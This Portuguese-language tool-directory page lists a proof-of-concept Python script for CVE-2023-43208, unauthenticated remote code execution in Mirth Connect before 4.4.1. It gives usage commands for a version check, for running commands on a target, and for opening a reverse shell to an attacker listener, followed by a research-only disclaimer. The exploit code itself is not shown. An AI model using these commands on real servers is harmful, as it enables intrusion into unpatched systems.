Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-43208-PoC — Script Python de prova de conceito demonstrando CVE‑2023‑43208 no Mirth Connect, permitindo verificações de versão e execução de comandos em instâncias vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/criz117/cve-2023-43208-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubcriz117/cve-2023-43208-poc

CVE-2023-43208-PoC

Script Python de prova de conceito demonstrando CVE‑2023‑43208 no Mirth Connect, permitindo verificações de versão e execução de comandos em instâncias vulneráveis.

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-43208 - RCE não autenticado no Mirth Connect

Requisitos

  • Python 3.11 ou superior (testado em 3.11, 3.12, 3.13)

Configuração

root@kitploit:~
# Crie um ambiente virtual limpo
python3 -m venv .venv
source .venv/bin/activate

# Instale as dependências fixadas
pip install -r requirements.txt

Uso

root@kitploit:~
# Apenas verificar a versão
python3 CVE-2023-43208.py -u https://TARGET/ --check

# Executar um único comando
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"

# Reverse shell (inicie o listener nc primeiro)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT

Notas

  • Uma resposta 500 do servidor é normal e esperada — o comando ainda é executado
  • Afeta Mirth Connect < 4.4.1
  • Aviso Legal

    Esta prova de conceito é fornecida apenas para fins de pesquisa e educação. Não a utilize contra sistemas que você não possui ou para os quais não tem permissão explícita para testar. O autor não se responsabiliza por qualquer uso indevido ou danos causados por este código.

    Baixar ferramenta